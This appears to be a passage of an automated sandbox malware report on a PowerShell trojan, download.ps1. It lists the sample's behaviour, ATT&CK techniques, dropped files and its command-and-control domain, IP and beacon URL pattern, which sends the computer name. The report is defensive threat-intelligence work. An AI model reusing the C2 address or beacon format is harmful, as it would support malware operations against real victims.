Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	121 Virtualization/Sandbox Evasion	OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	121 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	11 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
download.ps1	13%	ReversingLabs	Script-PowerShell.Trojan.Boxter

Source	Detection	Scanner	Label	Link
http://bkkeiekjfcdaaen.top/7umlt3rvkyhtr.php?id=user-PC&key=107945053478&s=527	100%	Avira URL Cloud	malware
http://$0zlj8fwiqx1ant6/$evdwf3lj9btnqu8.php?id=$env:computername&key=$lcwpdjugbir&s=527	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bkkeiekjfcdaaen.top	168.100.10.140	true	false		high
www.google.com	142.250.181.68	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://bkkeiekjfcdaaen.top/7umlt3rvkyhtr.php?id=user-PC&key=107945053478&s=527	false	Avira URL Cloud: malware	unknown
http://www.google.com/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.microsoft	powershell.exe, 00000000.00000002.1850710578.0000017172FF0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://photos.google.com/?tab=wq&pageId=none	powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.google.com/preferences?hl=enX	powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://csp.withgoogle.com/csp/gws/other-hp	powershell.exe, 00000000.00000002.1830918024.000001711022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.00000171017F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.000001710178A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1830918024.0000017110072000.00000004.00000800.00020000.00000000.sdmp	false		high
http://bkkeiekjfcdaaen.top	powershell.exe, 00000000.00000002.1802473956.0000017101780000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.00000171014E6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.co	powershell.exe, 00000000.00000002.1852942293.00000171731F8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000000.00000002.1830918024.0000017110072000.00000004.00000800.00020000.00000000.sdmp	false		high
https://news.google.com/?tab=wn	powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/?usp=docs_alc	powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schema.org/WebPage	powershell.exe, 00000000.00000002.1802473956.00000171017A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1830918024.0000017110072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.000001710236C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.000001710235D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.0000017102376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.000001710269F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.000001710237B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.000001710268F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://0.google.com/	powershell.exe, 00000000.00000002.1802473956.00000171017F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/webhp?tab=ww	powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schema.org/WebPageX	powershell.exe, 00000000.00000002.1802473956.00000171017F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000000.00000002.1830918024.0000017110072000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.1830918024.0000017110072000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/finance?tab=we	powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://maps.google.com/maps?hl=en&tab=wl	powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.google.com	powershell.exe, 00000000.00000002.1802473956.0000017101780000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.000001710178A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.000001710179E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://apis.google.com	powershell.exe, 00000000.00000002.1802473956.00000171017A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1830918024.0000017110072000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.1802473956.0000017100001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.blogger.com/?tab=wj	powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.google.com/mobile/?hl=en&tab=wD	powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://play.google.com/?hl=en&tab=w8	powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.1830918024.0000017110072000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/imghp?hl=en&tab=wi	powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/shopping?hl=en&source=og&tab=wf	powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lh3.googleusercontent.com/ogw/default-user=s96	powershell.exe, 00000000.00000002.1830918024.000001711022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1830918024.0000017110001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.00000171017F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.00000171017A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1830918024.0000017110072000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.1802473956.0000017100228000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000000.00000002.1802473956.0000017100228000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.1802473956.0000017100228000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/?tab=wo	powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000000.00000002.1830918024.0000017110072000.00000004.00000800.00020000.00000000.sdmp	false		high
https://0.google	powershell.exe, 00000000.00000002.1802473956.00000171017F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mail.google.com/mail/?tab=wm	powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.1802473956.0000017100228000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com/?tab=w1	powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://0.google.	powershell.exe, 00000000.00000002.1802473956.00000171017F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lh3.googleusercontent.com/ogw/default-user=s96X	powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://0.google.com/	powershell.exe, 00000000.00000002.1802473956.00000171017F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lh3.googleusercontent.com/ogw/default-user=s24	powershell.exe, 00000000.00000002.1830918024.0000017110072000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.google.com/history/optout?hl=en	powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://books.google.com/?hl=en&tab=wp	powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://translate.google.com/?hl=en&tab=wT	powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000000.00000002.1802473956.0000017100228000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/intl/en/about/products?tab=whX	powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://calendar.google.com/calendar?tab=wc	powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.1802473956.0000017100001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://$0zlj8fwiqx1ant6/$evdwf3lj9btnqu8.php?id=$env:computername&key=$lcwpdjugbir&s=527	powershell.exe, 00000000.00000002.1802473956.0000017100228000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lh3.googleusercontent.com/ogw/default-user=s24X	powershell.exe, 00000000.00000002.1802473956.0000017101996000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.181.68	www.google.com	United States		15169	GOOGLEUS	false
168.100.10.140	bkkeiekjfcdaaen.top	United States		3700	CLOUD9US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1561504
Start date and time:	2024-11-23 15:55:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	download.ps1
Detection:	MAL
Classification:	mal84.evad.winPS1@2/7@2/2
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 15 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .ps1

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 5332 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: download.ps1

Simulations

Behavior and APIs

Time	Type	Description
09:56:02	API Interceptor	45x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
168.100.10.140	download.ps1	Get hash	malicious	Unknown	Browse	bkkeiekjfcdaaen.top/4rftq71gychtr.php?id=computer&key=65957748638&s=527
	download.ps1	Get hash	malicious	Unknown	Browse	bkkeiekjfcdaaen.top/724fcgvj0zhtr.php?id=computer&key=19065964721&s=527
	download.ps1	Get hash	malicious	Unknown	Browse	bkkeiekjfcdaaen.top/azsnwdvty3htr.php?id=computer&key=26952593426&s=527
	download.ps1	Get hash	malicious	Unknown	Browse	bkkeiekjfcdaaen.top/8q15codrajhtr.php?id=computer&key=64783547223&s=527
	download.ps1	Get hash	malicious	Unknown	Browse	bkkeiekjfcdaaen.top/qcv23gjlkshtr.php?id=computer&key=37300482849&s=527
	download.ps1	Get hash	malicious	Unknown	Browse	bkkeiekjfcdaaen.top/vq1gdtb0ayhtr.php?id=computer&key=11725786925&s=527
	download.ps1	Get hash	malicious	Unknown	Browse	bkkeiekjfcdaaen.top/lxh9gvkpzrhtr.php?id=computer&key=17122624777&s=527
	download.ps1	Get hash	malicious	Unknown	Browse	bkkeiekjfcdaaen.top/lab7gj2rpmhtr.php?id=computer&key=60239845129&s=527
	download.ps1	Get hash	malicious	Unknown	Browse	bkkeiekjfcdaaen.top/57r28djmi4htr.php?id=user-PC&key=89603564784&s=527
	download.ps1	Get hash	malicious	Unknown	Browse	bkkeiekjfcdaaen.top/yzi6phkc0nhtr.php?id=computer&key=18594473799&s=527

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bkkeiekjfcdaaen.top	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUD9US	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140
	download.ps1	Get hash	malicious	Unknown	Browse	168.100.10.140

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulXg+//lz:NllUwu/l
MD5:	ED0FF51DEEE7DB96EC9C5624C12E0A04
SHA1:	515B7FC63DB9F9313A6AEE6B4A6266B0FB6FF3A7
SHA-256:	B93B1F8411ACBB11CBECF0F4E344D7D6D3551801BD891B816FB4720E60CE357B
SHA-512:	FD82F7D0B1B6F1641D2FF3F4EC6FEF66E2AB0F2048D7A5BBC674C379DD429516198FFD6E6E445C6EC1A2763ADAACF6288026B4A90697D86C8EED743A71F177ED
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................F..............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0puetep3.t4n.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sexvryeo.0di.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xonzhs1n.zy5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zcr5w3oc.jbu.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.7142913683380003
Encrypted:	false
SSDEEP:	96:HiC33CxHm+kvhkvCCt29df/VoHV9df/VoHn:HiCyGq2bYb8
MD5:	64551EA581AED7C07146722E63287491
SHA1:	E44317549D5FAF6D954C713501E77C0E6D41FE48
SHA-256:	A5F52D177FA6405437D457696E96BB578604A80EEF16D21BAED522CF5FA62026
SHA-512:	E1FC7AD95E11E6DE0E2DF3E49CF43357CD7AFC6416241FF9BAA4ADE1EDE77ED7ED552993D4C340DEE6D8B4A505C2678975C850404906CBB6D47EBE11E7079B20
Malicious:	false
Preview:	...................................FL..................F.".. ...-/.v........=..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v........=..T...=......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^wY.v...........................%..A.p.p.D.a.t.a...B.V.1.....wY.v..Roaming.@......CW.^wY.v..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^wY.w..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`...........................<..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^wY.w....Q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\81NN4CKRNRQPPCXUKCRO.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.7142913683380003
Encrypted:	false
SSDEEP:	96:HiC33CxHm+kvhkvCCt29df/VoHV9df/VoHn:HiCyGq2bYb8
MD5:	64551EA581AED7C07146722E63287491
SHA1:	E44317549D5FAF6D954C713501E77C0E6D41FE48
SHA-256:	A5F52D177FA6405437D457696E96BB578604A80EEF16D21BAED522CF5FA62026
SHA-512:	E1FC7AD95E11E6DE0E2DF3E49CF43357CD7AFC6416241FF9BAA4ADE1EDE77ED7ED552993D4C340DEE6D8B4A505C2678975C850404906CBB6D47EBE11E7079B20
Malicious:	false
Preview:	...................................FL..................F.".. ...-/.v........=..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v........=..T...=......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^wY.v...........................%..A.p.p.D.a.t.a...B.V.1.....wY.v..Roaming.@......CW.^wY.v..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^wY.w..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`...........................<..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^wY.w....Q...........

Static File Info

General

